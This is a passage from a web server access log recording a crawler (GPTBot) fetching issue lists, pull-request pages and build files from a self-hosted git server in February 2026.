(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19157] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11852] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12311] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12311] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:18:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9825] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:18:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fDependInfo.cmake" [Client 74.7.227.38] [Length 23970] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:18:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2flink.d" [Client 74.7.227.38] [Length 25802] [Gzip 6.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite%2fpython3.12%2fgreenlet%2fgreenlet.h" [Client 74.7.227.38] [Length 29176] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:18:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode" [Client 74.7.227.38] [Length 24921] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:18:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fdepend.make" [Client 74.7.227.38] [Length 22770] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:18:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeSystem.cmake" [Client 74.7.227.38] [Length 25472] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdC%2fa.out" [Client 74.7.227.38] [Length 24213] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fsrc" [Client 74.7.227.38] [Length 24485] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:18:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fmain.cpp.o.d" [Client 74.7.227.38] [Length 30959] [Gzip 7.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fa.out" [Client 74.7.227.38] [Length 24217] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir" [Client 74.7.227.38] [Length 24526] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:18:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fflags.make" [Client 74.7.227.38] [Length 23235] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fbuild.make" [Client 74.7.227.38] [Length 27004] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fmain.cpp.o" [Client 74.7.227.38] [Length 24231] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir" [Client 74.7.227.38] [Length 46457] [Gzip 10.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:18:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fprogress.make" [Client 74.7.227.38] [Length 22792] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:18:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:18:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgresPatrol.spec" [Client 74.7.227.38] [Length 21701] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:18:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgresPatrol.exe" [Client 74.7.227.38] [Length 19780] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:18:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=source" [Client 74.7.227.38] [Length 12465] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:18:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec?display=source" [Client 74.7.227.38] [Length 12501] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:18:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:18:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16403] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:18:39:33 +0000] - 404 404 - 